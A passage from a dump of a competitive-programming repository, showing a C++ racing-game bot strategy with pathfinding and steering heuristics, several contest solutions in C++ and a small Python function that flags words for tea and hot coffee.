"alphanum_fraction": 0.4268178641796112, "avg_line_length": 31.716386795043945, "blob_id": "34649822b79ae1c6b6668fa1eea05a7386c979f2", "content_id": "e3b15c634272555214697c34e24deea088d707a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 16148, "license_type": "no_license", "max_line_length": 169, "num_lines": 476, "path": "/trains/ai/cpp-cgdk/Old.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include \"MyStrategy.h\"\r\n\r\n#define PI 3.14159265358979323846\r\n#define _USE_MATH_DEFINES\r\n\r\n#include <bits/stdc++.h>\r\n#ifdef debug\r\n#include <library.h>\r\n#endif\r\n\r\nusing namespace model;\r\nusing namespace std;\r\n\r\ndouble DIST_TO_NEXT = 750;\r\nint COUNT_OF_FAILS = 100;\r\nint FORCE_BACK = 130;\r\nint FORCE_RIGHT = 60;\r\nint FORCE = 100;\r\nint BREAK = 30;\r\ndouble MAX_SPEED = 13.8;\r\nint FORCE_SLOW_DOWN = 1;\r\nint GLOBAL_FAIL = 2;\r\ndouble ANGLE_THROW = PI / 30;\r\n\r\nbool changed = false;\r\ndouble eps = 5;\r\ndouble power = 0.85;\r\ndouble distToNext = -10000, prevDistance;\r\nint countOfFails = 0;\r\nint forceBack = 0;\r\nint forceRight = 0;\r\nint force = 0;\r\nint prevx = 0;\r\nint currx = -1234;\r\nint forceSlow = 0;\r\nint globalFail = 0;\r\ndouble turn = 0.0;\r\ndouble tileSize = 0.0;\r\nint dir[15][4];\r\nvector<int> dx = {1, 0, -1, 0};\r\nvector<int> dy = {0, 1, 0, -1};\r\nbool init = true;\r\n\r\nvoid ppp(vector<vector<int>> a)\r\n{\r\n int n = a.size();\r\n int m = a[0].size();\r\n for (int j = 0; j < m; ++j)\r\n for (int i = 0; i < n; ++i)\r\n printf(\"%6d%c\", a[i][j], \"\\n \"[i != n - 1]);\r\n}\r\n\r\nbool isCorner(TileType a) \r\n{\r\n return !(a == VERTICAL || a == HORIZONTAL || a == CROSSROADS);\r\n}\r\n\r\nvoid MyStrategy::move(const Car& self, const World& world, const Game& game, Move& move) {\r\n if (init)\r\n {\r\n init = false;\r\n#ifdef debug\r\n writeln(world.getWaypoints());\r\n#endif\r\n srand(game.getRandomSeed());\r\n }\r\n tileSize = game.getTrackTileSize();\r\n auto a = world.getTilesXY();\r\n prevx = currx;\r\n if (prevx == -1234)\r\n prevx = self.getX();\r\n currx = self.getX();\r\n if (currx - prevx != 0)\r\n changed = true;\r\n int ti = self.getNextWaypointX();\r\n int tj = self.getNextWaypointY();\r\n auto wp = world.getWaypoints();\r\n int waypointIndex = self.getNextWaypointIndex();\r\n int fi, fj, pi, pj;\r\n if (waypointIndex < int(wp.size()) - 1)\r\n {\r\n int cx = int(self.getX() / tileSize);\r\n int cy = int(self.getY() / tileSize);\r\n int wx1 = wp[waypointIndex][0];\r\n int wx2 = wp[waypointIndex + 1][0];\r\n int wy1 = wp[waypointIndex][1];\r\n int wy2 = wp[waypointIndex + 1][1];\r\n if (\r\n (cx == wx1 && cx == wx2 && ((cy < wy1 && wy1 < wy2) || (cy > wy1 && wy1 > wy2)))\r\n ||\r\n (cy == wy1 && cy == wy2 && ((cx < wx1 && wx1 < wx2) || (cx > wx1 && wx1 > wx2)))\r\n )\r\n ti = wp[++waypointIndex][0],\r\n tj = wp[waypointIndex][1];\r\n if (waypointIndex + 1 < int(wp.size()))\r\n fi = wp[waypointIndex + 1][0],\r\n fj = wp[waypointIndex + 1][1];\r\n }\r\n auto tt = world.getTilesXY()[ti][tj];\r\n double targetX = (ti + 0.5) * tileSize;\r\n double targetY = (tj + 0.5) * tileSize;\r\n int si = self.getX() / tileSize;\r\n int sj = self.getY() / tileSize;\r\n int n = a.size();\r\n int m = a[0].size();\r\n auto ok = [&](int x, int N)\r\n {\r\n return x >= 0 && x < N;\r\n };\r\n\r\n auto getPath = [&](int si, int sj, int ti, int tj)\r\n {\r\n vector<vector<int>> d(n, vector<int>(m, 10000));\r\n vector<vector<pair<int, int>>> prev(n, vector<pair<int, int>>(m));\r\n d[si][sj] = 0;\r\n queue<pair<int, int>> q;\r\n q.push({si, sj});\r\n while (q.size())\r\n {\r\n int u = q.front().first;\r\n int v = q.front().second;\r\n q.pop();\r\n if (u == ti && v == tj)\r\n {\r\n vector<pair<int, int>> path;\r\n pair<int, int> start = {si, sj};\r\n while (u != start.first || v != start.second)\r\n path.push_back({u, v}),\r\n tie(u, v) = prev[u][v];\r\n path.push_back(start);\r\n reverse(path.begin(), path.end());\r\n return path;\r\n }\r\n for (int i = 0; i < 4; ++i)\r\n if (ok(u + dx[i], n) && ok(v + dy[i], m) && dir[a[u][v]][i])\r\n if (d[u + dx[i]][v + dy[i]] == 10000)\r\n d[u + dx[i]][v + dy[i]] = d[u][v] + 1,\r\n prev[u + dx[i]][v + dy[i]] = {u, v},\r\n q.push({u + dx[i], v + dy[i]});\r\n }\r\n return vector<pair<int, int>>(0);\r\n };\r\n vector<pair<int, int>> path = getPath(si, sj, ti, tj);\r\n if (path.size() >= 2)\r\n pi = path[path.size() - 2].first,\r\n pj = path[path.size() - 2].second;\r\n else\r\n pi = si,\r\n pj = sj;\r\n for (int i = 1; i < int(path.size()) - 1; ++i)\r\n if (abs(path[i + 1].first - path[i - 1].first) == 1 && abs(path[i + 1].second - path[i - 1].second) == 1)\r\n {\r\n#ifdef debug\r\n if (debug)\r\n {\r\n vector<string> xxx(m);\r\n for (int i = 0; i < m; ++i)\r\n for (int j = 0; j < n; ++j)\r\n xxx[i].push_back('.');\r\n for (int i = 0; i < path.size(); ++i)\r\n xxx[path[i].second][path[i].first] = i + 48;\r\n xxx[sj][si] = 'S';\r\n xxx[path[i].second][path[i].first] = 'X';\r\n xxx[tj][ti] = 'F';\r\n //ppp(d);\r\n writeln();\r\n writeln(xxx);\r\n writeln();\r\n }\r\n#endif\r\n fi = ti;\r\n fj = tj;\r\n tie(ti, tj) = path[i];\r\n tt = a[path[i].first][path[i].second];\r\n targetX = (path[i].first + 0.5) * tileSize;\r\n targetY = (path[i].second + 0.5) * tileSize;\r\n break;\r\n }\r\n double temp = self.getDistanceTo(targetX, targetY);\r\n double temp2 = temp / tileSize;\r\n prevDistance = distToNext;\r\n distToNext = temp;\r\n auto interpolation = [&](double x)\r\n {\r\n return\r\n + 5.28596 * pow(x, 8)\r\n - 49.1259 * pow(x, 7)\r\n + 189.037 * pow(x, 6)\r\n - 388.625 * pow(x, 5)\r\n + 458.98 * pow(x, 4)\r\n - 310.246 * pow(x, 3)\r\n + 110.424 * pow(x, 2)\r\n - 15.6552 * pow(x, 1)\r\n + 0.2;//идеально при малой скорости\r\n return\r\n + 7.16332 * pow(x, 8)\r\n - 67.0616 * pow(x, 7)\r\n + 260.855 * pow(x, 6)\r\n - 544.344 * pow(x, 5)\r\n + 655.525 * pow(x, 4)\r\n - 453.69 * pow(x, 3)\r\n + 165.888 * pow(x, 2)\r\n - 24.2604 * pow(x, 1)\r\n + 0.2; //хреново входит в поворот\r\n return\r\n + 1.68041 * pow(x, 7)\r\n - 14.0981 * pow(x, 6)\r\n + 47.7581 * pow(x, 5)\r\n - 82.7825 * pow(x, 4)\r\n + 76.7515 * pow(x, 3)\r\n - 36.3308 * pow(x, 2)\r\n + 7.15476 * pow(x, 1)\r\n + 0.2; //на скорости влезает, но задевает угол ~-2\r\n return \r\n - 0.57084 * pow(x, 10)\r\n + 10.9758 * pow(x, 9)\r\n - 91.814 * pow(x, 8)\r\n + 438.632 * pow(x, 7)\r\n - 1320.67 * pow(x, 6)\r\n + 2608.54 * pow(x, 5)\r\n - 3408.95 * pow(x, 4)\r\n + 2898.79 * pow(x, 3)\r\n - 1530.02 * pow(x, 2)\r\n + 451.546 * pow(x, 1)\r\n - 56.1279; //шикарно в большие повороты\r\n };\r\n double MAAAAAGIC = interpolation(temp2);\r\n//interpolate({0, 0.2}, {0.5, 0.4}, {0.75, 0.365}, {1, 1/3}, {1.2, 0.2}, {1.4142135624, 0}, {1.66666, -3/16}, {2, -1/4})\r\n if (temp2 > 2)\r\n MAAAAAGIC = -0.25;\r\n //if (temp2 > 2)\r\n //{\r\n //double angle = self.getAngleTo(targetX, targetY);\r\n //cout << angle << \"\\n\";\r\n //if (angle > -PI / 10 && angle < PI)\r\n //cout << \"FORCE TURN\\n\",\r\n //MAAAAAGIC = -1;\r\n //}\r\n if (temp2 < 0.5)\r\n MAAAAAGIC = 0.3;\r\n double nextWaypointX = targetX;\r\n double nextWaypointY = targetY;\r\n\r\n double cornerTileOffset = MAAAAAGIC * tileSize;\r\n //cout << temp / tileSize << \" \" << MAAAAAGIC << \" \" << cornerTileOffset << \"\\n\";\r\n auto pathtitj = getPath(ti, tj, fi, fj);\r\n#ifdef debug\r\n if (pathtitj.size() >= 2)\r\n fi = pathtitj[1].first,\r\n fj = pathtitj[1].second;\r\n writeln(si, sj, pi, pj, ti, tj, fi, fj);\r\n writeln(pathtitj);\r\n writeln();\r\n#endif\r\n auto changeCoords = [&](TileType type) {\r\n switch (type) {\r\n case LEFT_TOP_CORNER:\r\nlt:\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case RIGHT_TOP_CORNER:\r\nrt:\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case LEFT_BOTTOM_CORNER:\r\nlb:\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case RIGHT_BOTTOM_CORNER:\r\nrb:\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case TOP_HEADED_T:\r\n if (pi == ti)\r\n if (ti + 1 == fi)\r\n goto lb;\r\n else\r\n goto rb;\r\n else\r\n if (pj == tj && pj == fj)\r\n nextWaypointY += cornerTileOffset;\r\n else\r\n if (ti + 1 == pi)\r\n goto lb;\r\n else\r\n goto rb;\r\n //if (pathtitj.size() > 1 && pathtitj[1].first == pathtitj[0].first + 1 && pathtitj[1].second == pathtitj[0].second)\r\n //goto rb;\r\n //if (pathtitj.size() > 1 && pathtitj[1].first == pathtitj[0].first - 1 && pathtitj[1].second == pathtitj[0].second)\r\n //goto lb;\r\n\r\n break;\r\n case BOTTOM_HEADED_T:\r\n if (pi == ti)\r\n if (ti + 1 == fi)\r\n goto lt;\r\n else\r\n goto rt;\r\n else\r\n if (pj == tj && pj == fj)\r\n nextWaypointY -= cornerTileOffset;\r\n else\r\n if (ti + 1 == pi) \r\n goto lt;\r\n else\r\n goto rt;\r\n break;\r\n case RIGHT_HEADED_T:\r\n if (pathtitj.size() > 1 && pathtitj[1].first == pathtitj[0].first && pathtitj[1].second == pathtitj[0].second + 1)\r\n goto lt;\r\n //goto rt; \r\n if (pathtitj.size() > 1 && pathtitj[1].first == pathtitj[0].first && pathtitj[1].second == pathtitj[0].second - 1)\r\n goto lb;\r\n //goto rb;\r\n break;\r\n case LEFT_HEADED_T:\r\n if (pathtitj.size() > 1 && pathtitj[1].first == pathtitj[0].first && pathtitj[1].second == pathtitj[0].second + 1)\r\n goto rt;\r\n //goto lt; \r\n if (pathtitj.size() > 1 && pathtitj[1].first == pathtitj[0].first && pathtitj[1].second == pathtitj[0].second - 1)\r\n goto rb;\r\n //goto lb;\r\n break;\r\n default:\r\n break;\r\n }\r\n };\r\n changeCoords(tt);\r\n //cout << targetX << \" \" << targetY << \"\\n\";\r\n //cout << nextWaypointX << \" \" << nextWaypointY << \"\\n\\n\";\r\n\r\n double angleToWaypoint = self.getAngleTo(nextWaypointX, nextWaypointY);\r\n double speedModule = hypot(self.getSpeedX(), self.getSpeedY());\r\n auto getTurn = [&](double d)\r\n {\r\n return angleToWaypoint * d * pow(DIST_TO_NEXT / distToNext, 0.8) / PI;\r\n };\r\n\r\n if (forceBack)\r\n {\r\n forceBack--;\r\n if (forceBack == 0)\r\n {\r\n power *= -1;\r\n forceRight = FORCE_RIGHT;\r\n turn *= -1;\r\n }\r\n }\r\n\r\n else if (forceRight)\r\n {\r\n if (forceRight > FORCE_RIGHT - BREAK)\r\n move.setBrake(true);\r\n forceRight--;\r\n if (forceRight == 0)\r\n force = FORCE;\r\n } \r\n if (!forceBack)\r\n {\r\n if (changed && fabs(prevDistance - distToNext) < eps)\r\n {\r\n countOfFails++;\r\n {\r\n if (countOfFails > COUNT_OF_FAILS)\r\n {\r\n globalFail++;\r\n countOfFails = 0;\r\n forceBack = FORCE_BACK;\r\n turn = getTurn(32);\r\n if (isCorner(world.getTilesXY()[si][sj]))\r\n {\r\n //cout << \"CORNER\";\r\n turn = turn > 0 ? 1 : -1;\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"GLOBAL_FAIL\",\r\n turn *= -1;\r\n }\r\n else\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"NOT CORNER GLOBAL_FAIL\",\r\n turn = turn > 0 ? 1 : -1;\r\n turn *= -1;\r\n power *= -1;\r\n }\r\n }\r\n //else\r\n //if (countOfFails > COUNT_OF_FAILS / 5)\r\n //{\r\n //forceRight = 0;\r\n //force = 0;\r\n //countOfFails = COUNT_OF_FAILS;\r\n //}\r\n }\r\n else\r\n {\r\n if (force)\r\n force--;\r\n if (forceSlow)\r\n forceSlow--;\r\n countOfFails = 0;\r\n globalFail = 0;\r\n\r\n if (forceRight == 0)\r\n turn = getTurn(36);\r\n //if (speedModule * speedModule * fabs(angleToWaypoint) > 6 * PI && distToNext < DIST_TO_NEXT || \r\n double dd = speedModule / MAX_SPEED;// * 1.1;\r\n //cout << dd << \" \" << distToNext << \"\\n\";\r\n //if (dd > 1)\r\n //dd = 6;\r\n if ((distToNext < tileSize * dd && distToNext > tileSize) || forceSlow)\r\n if (isCorner(tt))\r\n move.setBrake(true);\r\n power = max(isCorner(tt) ? 1.0 : 1.0, distToNext / DIST_TO_NEXT);\r\n }\r\n }\r\n //else\r\n //if (changed && fabs(prevDistance - distToNext) < eps)\r\n //{\r\n //countOfFails++;\r\n //if (countOfFails > COUNT_OF_FAILS / 3)\r\n //forceRight = FORCE_RIGHT;\r\n //}\r\n //else\r\n //countOfFails = 0;\r\n move.setWheelTurn(turn);\r\n move.setEnginePower(power);\r\n for (auto car : world.getCars())\r\n if (!car.isTeammate())\r\n {\r\n //cout << self.getAngleTo(car) / PI * 180 << \"\\n\";\r\n if (self.getDistanceTo(car) <= tileSize)\r\n {\r\n if (fabs(self.getAngleTo(car)) < ANGLE_THROW && car.getDurability() > 0 && !car.isFinishedTrack())\r\n move.setThrowProjectile(true);\r\n if (self.getAngleTo(car) + ANGLE_THROW * 2 > PI || self.getAngleTo(car) - ANGLE_THROW * 2 < -PI)\r\n move.setSpillOil(true);\r\n }\r\n }\r\n if (world.getTick() > 210 && distToNext > prevDistance)\r\n {\r\n forceSlow = FORCE_SLOW_DOWN;\r\n if (distToNext > tileSize * 5)\r\n forceSlow /= 2;\r\n }\r\n if (self.getRemainingOiledTicks() > 0)\r\n forceSlow = 0;\r\n if (world.getTick() > 210 && (distToNext > prevDistance && distToNext > tileSize * 5))\r\n move.setUseNitro(true);\r\n if (world.getTick() == 140)\r\n move.setUseNitro(true);\r\n}\r\n\r\nMyStrategy::MyStrategy() \r\n{\r\n dir[1][1] = dir[1][3] = true;\r\n dir[2][0] = dir[2][2] = true;\r\n\r\n dir[3][0] = dir[3][1] = true;\r\n dir[4][1] = dir[4][2] = true;\r\n dir[5][0] = dir[5][3] = true;\r\n dir[6][2] = dir[6][3] = true;\r\n\r\n dir[7][1] = dir[7][2] = dir[7][3] = true;\r\n dir[8][0] = dir[8][1] = dir[8][3] = true;\r\n dir[9][0] = dir[9][2] = dir[9][3] = true;\r\n dir[10][0] = dir[10][1] = dir[10][2] = true;\r\n\r\n dir[CROSSROADS][0] = dir[11][1] = dir[11][2] = dir[11][3] = true;\r\n freopen(\"lol\", \"w\", stdout);\r\n}\r\n\r\n//interpolate({0.5, 0.4}, {0.65, 0.365}, {0.85, 1/3}, {1.2, 0.2}, {1.4142135624, 0}, {1.66666, -1/8}, {2, -1/4}, {2.5, -1/3}, {3, -0.365}, {3.5, -0.365}, {3.25, -0.365})\r\n" }, { "alpha_fraction": 0.3108677268028259, "alphanum_fraction": 0.34203875064849854, "avg_line_length": 20.214284896850586, "blob_id": "40e6ee4d868206e8294b5d3da3edcd90bccd98eb", "content_id": "d01e7207690acdca815fcadeec83cfb3b7b694d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1187, "license_type": "no_license", "max_line_length": 73, "num_lines": 56, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.28/EWA15.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#define TASKNAME \"\"\n \n#include <bits/stdc++.h>\n \nusing namespace std;\n \nconst int MaxN = 4 * 100000;\nint a[MaxN];\n \n \nvector <pair <int, int> > ans;\nint main()\n{\n // freopen(\"in.in.c\", \"r\", stdin);\n int n, p = 0, q = 0;\n cin >> n;\n q = n;\n for (int i = 0; i < n; ++i){\n int x, y;\n cin >> x >> y;\n a[i] = x - y;\n if (a[i] > 0)\n p++;\n }\n int s = q - 2 * p;\n s++;\n if (s <= 0){\n cout << 0;\n return 0;\n }\n for (int ok = 0; ok < n - 1; ++ok){\n if (a[ok] <= 0 && a[ok + 1] <= 0){\n ok++;\n ans.push_back({ok - 1, ok});\n } else\n if (a[ok] <= 0 && a[ok + 1] > 0 && (a[ok] + a[ok + 1] > 0)){\n ok++;\n ans.push_back({ok - 1, ok});\n } else\n if (a[ok + 1] <= 0 && a[ok] > 0 && (a[ok] + a[ok + 1] > 0)){\n ok++;\n ans.push_back({ok - 1, ok});\n }\n }\n if (ans.size() < s)\n cout << -1;\n else\n {\n cout << s << endl;\n for (int i = 0; i < s; ++i){\n cout << ans[i].first + 1 << \" \" << ans[i].second + 1 << endl;\n }\n }\n \n// freopen(TASKNAME\".out\", \"w\", stdout);\n}" }, { "alpha_fraction": 0.5112687945365906, "alphanum_fraction": 0.5313021540641785, "avg_line_length": 23.4489803314209, "blob_id": "99bf643d5c30e38e0c5be37f6319850ac260774f", "content_id": "517cf8a44e89058387ea46d40f1f140d5bb86fa0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2396, "license_type": "no_license", "max_line_length": 107, "num_lines": 98, "path": "/2019/GCJ1C/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(a.size())\n\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\n//Igorjan\n//}}}\n\nchar ask(int x)\n{\n cout << x + 1 << endl;\n char c;\n cin >> c;\n return c;\n}\n\nvoid run()\n{\n string ans;\n vector<int> positions(119);\n iota(whole(positions), 0);\n set<char> was;\n forn(q, 4)\n {\n map<char, vector<int>> m;\n for (int x: positions)\n m[ask(x * 5 + q)].pb(x);\n int mn = MOD;\n char add;\n for (auto& x: m)\n if (x.second.size() < mn)\n mn = x.second.size(),\n add = x.first;\n positions = m[add];\n ans += add;\n was.insert(add);\n }\n string temp = \"ABCDE\";\n for (char c: temp)\n if (was.find(c) == was.end())\n ans += c;\n swap(ans[3], ans[4]);\n cout << ans << endl;\n char c;\n cin >> c;\n if (c == 'N') exit(1);\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n int t, f;\n cin >> t >> f;\n fori(t)\n run();\n#ifndef ONLINE_JUDGE\n //writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n" }, { "alpha_fraction": 0.49575871229171753, "alphanum_fraction": 0.5018849968910217, "avg_line_length": 21.817203521728516, "blob_id": "1190b3b5dd020355284da1dbf8d90964dd27be7f", "content_id": "301521c4ae34a826249f754257304c483d073eb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2122, "license_type": "no_license", "max_line_length": 85, "num_lines": 93, "path": "/2014/gcj2014_0/A.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#ifndef CASE_HPP\n#define CASE_HPP\n\n#include <bits/stdc++.h>\n#include <QObject>\n#include <QRunnable>\n#include <QThread>\n#include <QTextStream>\n#include <QDebug>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\n\nclass Case : public QObject, public QRunnable\n{\n Q_OBJECT\n int first, second, n = 4, x, count = 0, ans;\n set<int> s[4], d[4];\n\npublic:\n void readInput(QTextStream &in)\n {\n in >> first;\n fori(n)\n forj(n)\n in >> x,\n s[i].insert(x);\n in >> second;\n fori(n)\n forj(n)\n in >> x,\n d[i].insert(x);\n }\n\n void writeResults(QTextStream &out)\n {\n out << \"Case #\" << case_number << \": \";\n switch (count)\n {\n case 0:\n out << \"Volunteer cheated!\" << \"\\n\";\n break;\n case 1:\n out << ans << \"\\n\";\n break;\n default:\n out << \"Bad magician!\" << \"\\n\";\n }\n }\n\n void solution()\n {\n first--;\n second--;\n fors(i, s[first])\n if (d[second].find(*i) != d[second].end())\n count++,\n ans = *i;\n }\n\n explicit Case() : QObject(0), solved(false) { setAutoDelete(false); }\n\n void run()\n {\n solution();\n solved = true;\n emit caseSolved(this);\n }\n\n inline bool is_solved() const { return solved; }\n inline void setCaseNumber(int n) { case_number = n; }\n\nsignals:\n void caseSolved(Case*);\n\nprivate:\n int case_number;\n bool solved;\n};\n\n#endif // CASE_HPP\n" }, { "alpha_fraction": 0.36684492230415344, "alphanum_fraction": 0.37754011154174805, "avg_line_length": 21.8216552734375, "blob_id": "58d7d38c446d47637547642af6ee96b2e9626586", "content_id": "71b38922c065ce325fac1b2ed156ea55a784c703", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3740, "license_type": "no_license", "max_line_length": 102, "num_lines": 157, "path": "/trash/lab_da_smthng/mincost/maxflinfo.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\r\n#include <iostream>\r\n#include <stack>\r\n#include <vector>\r\n#include <stdio.h>\r\n#include <queue>\r\n#define enter printf(\"\\n\");\r\n#define ooo printf(\"o\\n\");\r\n \r\nusing namespace std;\r\n \r\nstruct edge\r\n{\r\n int y, c, f, p, opp;\r\n edge(int e, int r, int t, int u, int o)\r\n {\r\n y = e;\r\n c = r;\r\n f = t;\r\n p = u;\r\n opp = o;\r\n }\r\n edge(){};\r\n};\r\n \r\nvoid writeln(int a)\r\n{\r\n printf(\"%d\\n\", a);\r\n}\r\n \r\nconst int INF = 1000000002;\r\nvector<int> d, p, path, place, fi, ficur;\r\nvector< vector< edge > > edges;\r\npriority_queue< pair<int, int> > q;\r\nvector<bool> in, used;\r\nint s = 1;\r\nint f, u, v, w, curd, n, m, mn, dfi;\r\n \r\nvoid debug()\r\n{\r\n for (int i = 1; i <= n; i++)\r\n for (int j = 0; j < edges[i].size(); j++)\r\n printf(\"%d %d %d %d %d\\n\", i, edges[i][j].y, edges[i][j].p, edges[i][j].c, edges[i][j].f);\r\n}\r\n \r\nvoid FordBellman()\r\n{\r\n fi.resize(n + 1);\r\n in.resize(n + 1, false);\r\n fi[s] = 0;\r\n in[s] = true;\r\n queue<int> qfb;\r\n qfb.push(s);\r\n int u, v, w;\r\n while (!qfb.empty())\r\n {\r\n u = qfb.front();\r\n qfb.pop();\r\n in[u] = false;\r\n for (int i = 0; i < edges[u].size(); i++)\r\n {\r\n if (edges[u][i].c <= edges[u][i].f)\r\n continue;\r\n v = edges[u][i].y;\r\n w = edges[u][i].p + fi[u];\r\n if (fi[v] > w)\r\n {\r\n fi[v] = w;\r\n if (!in[v])\r\n in[v] = true,\r\n qfb.push(v);\r\n }\r\n }\r\n }\r\n for (int i = 1; i <= n; i++)\r\n for (int j = 0; j < edges[i].size(); j++)\r\n edges[i][j].p += (fi[i] - fi[edges[i][j].y]);\r\n }\r\n \r\nint dijkstra()\r\n{\r\n q.push(make_pair(0, s));\r\n d.clear();\r\n d.resize(n + 1, INF);\r\n used.clear();\r\n used.resize(n + 1, false);\r\n d[s] = 0;\r\n mn = INF;\r\n if (s == f)\r\n return 0;\r\n while (!q.empty())\r\n {\r\n u = q.top().second;\r\n curd = -q.top().first;\r\n q.pop();\r\n if (curd > d[u])\r\n continue;\r\n for (int i = 0; i < edges[u].size(); i++)\r\n {\r\n if (edges[u][i].c <= edges[u][i].f)\r\n continue;\r\n v = edges[u][i].y;\r\n w = edges[u][i].p;\r\n if (u == v)\r\n continue;\r\n dfi = d[u] + w;\r\n if (d[v] > dfi || !used[v])\r\n {\r\n d[v] = dfi;\r\n p[v] = u;\r\n mn = min(edges[u][i].c - edges[u][i].f, mn);\r\n place[v] = i;\r\n q.push(make_pair(-d[v], v));\r\n used[v] = true;\r\n }\r\n }\r\n }\r\n return (d[f] == INF || !used[f]) ? -1 : d[f];\r\n}\r\n \r\nint main()\r\n{\r\n freopen(\"mincost.in\", \"r\", stdin);\r\n freopen(\"mincost.out\", \"w+\", stdout);\r\n scanf(\"%d %d\\n\", &n, &m);\r\n f = n;\r\n edges.resize(n + 1);\r\n place.resize(n + 1);\r\n p.resize(n + 1);\r\n int x, y, c, pp, add;\r\n long long price = 0;\r\n for (int i = 1; i <= m; i++)\r\n {\r\n scanf(\"%d %d %d %d\", &x, &y, &c, &pp);\r\n edge r = edge(y, c, 0, pp, edges[y].size());\r\n edges[x].push_back(r);\r\n edge r1 = edge(x, 0, 0, -pp, edges[x].size() - 1);\r\n edges[y].push_back(r1);\r\n }\r\n fclose(stdin);\r\n FordBellman();\r\n while (true)\r\n {\r\n add = dijkstra();\r\n if (add == -1)\r\n break;\r\n for (int v = f; v != s; v = p[v])\r\n {\r\n edges[p[v]][place[v]].f += mn;\r\n edges[ edges[p[v]][place[v]].y ][ edges[p[v]][place[v]].opp ].f -= mn;\r\n }\r\n price += mn * add + fi[n] - fi[1];\r\n }\r\n cout << price << endl;\r\n fclose(stdout);\r\n return 0;\r\n}\r\n" }, { "alpha_fraction": 0.5486618280410767, "alphanum_fraction": 0.5523114204406738, "avg_line_length": 30.576923370361328, "blob_id": "728971fb58e81a2d746fd90fa11acd2cf8100341", "content_id": "21d92049aa730f10b1496ea3d69c0a8f0a29dadd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1032, "license_type": "no_license", "max_line_length": 101, "num_lines": 26, "path": "/2023/tin/8.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n# python 3.10\nimport re\n\n\ndef find_ban_words(text: str) -> list[str]:\n ret = set()\n for c in ['чай', 'чая', 'чаю', 'чаи', 'чае', 'чайный', 'чайного', 'чайному', 'чайным', 'чайном']:\n if c in text:\n ret.add('чай')\n if re.match(r'.*горячий .*кофе.*', text):\n ret.add('горячий кофе')\n if re.match(r'.*горячего .*кофе.*', text):\n ret.add('горячий кофе')\n if re.match(r'.*горячему .*кофе.*', text):\n ret.add('горячий кофе')\n if re.match(r'.*горячим .*кофе.*', text):\n ret.add('горячий кофе')\n if re.match(r'.*горячем .*кофе.*', text):\n ret.add('горячий кофе')\n return list(sorted(ret))\n\n\nif __name__ == \"__main__\":\n input_str = input()\n # Необходимо преобразовать список в строку перед выводом.\n print(', '.join(find_ban_words(input_str)))\n" }, { "alpha_fraction": 0.31935882568359375, "alphanum_fraction": 0.3403205871582031, "avg_line_length": 18.780487060546875, "blob_id": "a6b11c416762755312faef1478336f9b08ba86f5", "content_id": "8f392f5af2cf9335e57b69548ab891c5fb562d69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 811, "license_type": "no_license", "max_line_length": 60, "num_lines": 41, "path": "/2016/snws1/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\nusing namespace std;\n\nvoid run()\n{\n string s;\n cin >> s;\n vector<int> a(26, 0);\n int prev = -1;\n int n = s.size();\n for (int i = 0; i < n; 